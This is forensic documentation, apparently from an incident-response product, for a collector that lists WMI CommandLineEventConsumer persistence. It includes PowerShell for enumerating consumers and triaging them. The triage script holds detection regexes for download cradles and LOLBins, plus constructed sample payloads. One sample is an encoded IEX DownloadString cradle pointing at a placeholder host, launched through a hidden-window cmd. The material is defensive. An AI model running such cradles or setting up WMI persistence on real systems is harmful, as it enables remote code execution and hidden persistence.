WMI Command Line
Overview
Evidence: WMI Command Line
Description: Dump WMI Command Line Event Consumers
Category: System
Platform: windows
Short Name: wmicec
Is Parsed: Yes
Sent to Investigation Hub: Yes
Collect File(s): No
Background
A WMI CommandLineEventConsumer is one half of a permanent WMI event subscription: an __EventFilter holds a WQL query describing the triggering event (a process start, a time interval, a logon), a __FilterToConsumerBinding links that filter to the consumer, and when the event fires the consumer runs the command held in its CommandLineTemplate. The WMI provider host executes the command as SYSTEM, the subscription survives reboots, and none of it appears in the Run keys or scheduled tasks an analyst checks first, which is why attackers use it for persistence.
A CommandLine consumer can run any command-line program, including PowerShell, cmd.exe, or a dropped executable, so the payload field is the first thing to read when a consumer turns up.
Data Collected
This collector produces one record per CommandLineEventConsumer instance found, with the fields below.
WMI Command Line Data
| Field | Description | Example |
|---|---|---|
| Name | Consumer name | BadConsumer |
| PayloadCommand | Command template to execute (the consumer's CommandLineTemplate property) | cmd.exe /c powershell.exe -enc … |
| PayloadExecutable | Executable path (the consumer's ExecutablePath property; may be empty when the command template names the program) | C:\Windows\System32\cmd.exe |
Collection Method
This collector queries WMI for CommandLineEventConsumer instances in multiple namespaces, so that a consumer registered outside the default subscription namespace is not missed:
- ROOT\Subscription (where permanent event subscriptions are normally registered)
- ROOT\DEFAULT
- ROOT\CIMV2
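The following PowerShell is an added example, not the collector's own code. It enumerates CommandLineEventConsumer instances in the three namespaces above and resolves each one through __FilterToConsumerBinding to its __EventFilter, so the output shows the trigger query alongside the payload fields described in the table. It assumes a Windows host and, for ROOT\Subscription, local administrator rights; the function and property names Get-WmiCommandLineConsumer, Get-RefName and Bound are this example's own.

```powershell
# Added example, not the collector's code. Enumerate CommandLineEventConsumer
# instances and resolve the filter that fires each one. Run on a Windows host as
# an administrator.

$Namespaces = 'ROOT\Subscription', 'ROOT\DEFAULT', 'ROOT\CIMV2'

function Get-RefName($ref) {
    # Reference properties of __FilterToConsumerBinding come back either as a
    # CimInstance (Get-CimInstance) or as a WMI path string such as
    # 'CommandLineEventConsumer.Name="BadConsumer"'. Return just the Name key.
    if ($null -eq $ref) { return $null }
    if ($ref.PSObject.Properties['Name']) { return [string]$ref.Name }
    if ("$ref" -match 'Name="([^"]+)"') { return $Matches[1] }
    return "$ref"
}

function Get-WmiCommandLineConsumer {
    foreach ($ns in $Namespaces) {
        # The consumer class is normally registered only in ROOT\Subscription; in
        # the other namespaces the query fails with "Invalid class", which is not
        # a finding, so that error is suppressed.
        $consumers = @(Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue)
        if ($consumers.Count -eq 0) { continue }

        # Bindings and filters live in the same namespace as the consumer. Keep only
        # bindings whose Consumer reference points at a CommandLineEventConsumer, so
        # an ActiveScriptEventConsumer with the same Name is not matched by accident.
        $bindings = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue |
                      Where-Object { "$($_.Consumer)" -match 'CommandLineEventConsumer' })
        $filters  = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue)

        foreach ($c in $consumers) {
            $myBindings  = @($bindings | Where-Object { (Get-RefName $_.Consumer) -eq $c.Name })
            $filterNames = @($myBindings | ForEach-Object { Get-RefName $_.Filter })
            $queries     = @($filters | Where-Object { $filterNames -contains $_.Name } | ForEach-Object { $_.Query })

            [pscustomobject]@{
                Namespace         = $ns
                Name              = $c.Name
                PayloadCommand    = $c.CommandLineTemplate   # the PayloadCommand field above
                PayloadExecutable = $c.ExecutablePath        # the PayloadExecutable field above
                RunInteractively  = $c.RunInteractively
                # An unbound consumer fires nothing yet, but attackers stage consumers
                # and add the binding later, so report it rather than drop it.
                Bound             = $myBindings.Count -gt 0
                FilterName        = $filterNames -join '; '
                FilterQuery       = $queries -join '; '
            }
        }
    }
}

Get-WmiCommandLineConsumer | Format-List
```

The FilterQuery column is what tells you when the payload runs: a query on Win32_LocalTime or __InstanceModificationEvent against Win32_PerfFormattedData_PerfOS_System with a TargetInstance.SystemUpTime condition is the classic "run shortly after boot" trigger, while a __InstanceCreationEvent on Win32_Process fires on a process start.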
Forensic Value
CommandLine consumers give an attacker command execution that persists across reboots without touching the usual autostart locations. Investigators use this data to detect WMI command-based persistence, identify malicious command payloads (encoded PowerShell, download cradles, executables staged in user-writable directories), track PowerShell execution launched via WMI, and detect living-off-the-land persistence that runs signed Windows binaries such as mshta.exe or regsvr32.exe from a consumer.
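As an added example, not part of this page or the collector, the PowerShell below applies a triage pass to collected records: it decodes a PowerShell -EncodedCommand payload (base64 of UTF-16LE text) and flags the indicators called out above, encoded commands, download cradles, living-off-the-land binaries, hidden-window switches and payloads in user-writable paths. The three records and the example.invalid URL are constructed sample data; the rule names, thresholds and the functions Get-DecodedCommand and Invoke-WmiConsumerTriage are this example's own choices.

```powershell
# Added example, not the collector's code. Triage collected WMI Command Line
# records offline; the sample records below are constructed.

function Get-DecodedCommand([string]$cmd) {
    # powershell.exe -EncodedCommand (also -enc / -ec) takes base64 of UTF-16LE text.
    if ($cmd -match '(?i)-e(c|nc|ncodedcommand)\b\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) }
        catch { return $null }   # not valid base64: leave undecoded
    }
    return $null
}

# Indicator rules; each is a regex run over executable + command template, and
# again over the decoded script so indicators hidden inside -enc payloads count.
$Rules = @(
    @{ Name = 'EncodedPowerShell'; Pattern = '(?i)powershell.*\s-e(c|nc|ncodedcommand)\b' }
    @{ Name = 'DownloadCradle';    Pattern = '(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer' }
    @{ Name = 'LOLBin';            Pattern = '(?i)\b(mshta|regsvr32|rundll32|certutil|bitsadmin|wscript|cscript|msiexec)(\.exe)?\b' }
    @{ Name = 'HiddenWindow';      Pattern = '(?i)-w(indowstyle)?\s+hidden|-nop\b|-noni\b' }
    @{ Name = 'WritablePath';      Pattern = '(?i)\\(Temp|AppData|ProgramData|Public|Users\\[^\\]+\\Downloads)\\' }
)

function Invoke-WmiConsumerTriage($records) {
    foreach ($r in $records) {
        $text = "$($r.PayloadExecutable) $($r.PayloadCommand)"
        $hits = @($Rules | Where-Object { $text -match $_.Pattern } | ForEach-Object { $_.Name })

        $decoded = Get-DecodedCommand $r.PayloadCommand
        if ($decoded) {
            $hits += @($Rules | Where-Object { $decoded -match $_.Pattern -and $hits -notcontains $_.Name } |
                       ForEach-Object { $_.Name })
        }

        # Two independent indicators is the threshold used here; one is worth a look.
        $verdict = if ($hits.Count -ge 2) { 'Suspicious' } elseif ($hits.Count -eq 1) { 'Review' } else { 'NoIndicator' }

        [pscustomobject]@{
            Name       = $r.Name
            Verdict    = $verdict
            Indicators = $hits -join ','
            Decoded    = $decoded
        }
    }
}

# Constructed sample records in the collector's field layout. The encoded payload
# is built here so the decode path is exercised; the URL is a placeholder.
$stage = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
$b64   = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stage))
$SampleRecords = @(
    [pscustomobject]@{ Name = 'BadConsumer';  PayloadExecutable = 'C:\Windows\System32\cmd.exe'
                       PayloadCommand = "cmd.exe /c powershell.exe -NoP -W Hidden -enc $b64" }
    [pscustomobject]@{ Name = 'Updater';      PayloadExecutable = 'C:\Windows\System32\rundll32.exe'
                       PayloadCommand = 'rundll32.exe C:\Users\Public\net.dll,Start' }
    [pscustomobject]@{ Name = 'VendorBackup'; PayloadExecutable = 'C:\Program Files\Vendor\backup.exe'
                       PayloadCommand = '"C:\Program Files\Vendor\backup.exe" /quiet' }
)

# Expected: BadConsumer -> Suspicious (EncodedPowerShell, HiddenWindow, DownloadCradle
# from the decoded script); Updater -> Suspicious (LOLBin, WritablePath);
# VendorBackup -> NoIndicator.
Invoke-WmiConsumerTriage $SampleRecords | Format-Table -AutoSize -Wrap
```

The decode step matters because the indicator that actually tells the story (the download cradle) is invisible in the raw PayloadCommand of the first record; scoring only the collected string would under-rate it. Treat the rule list as a starting point, and pair any hit with the filter query and binding from the same namespace before calling it persistence.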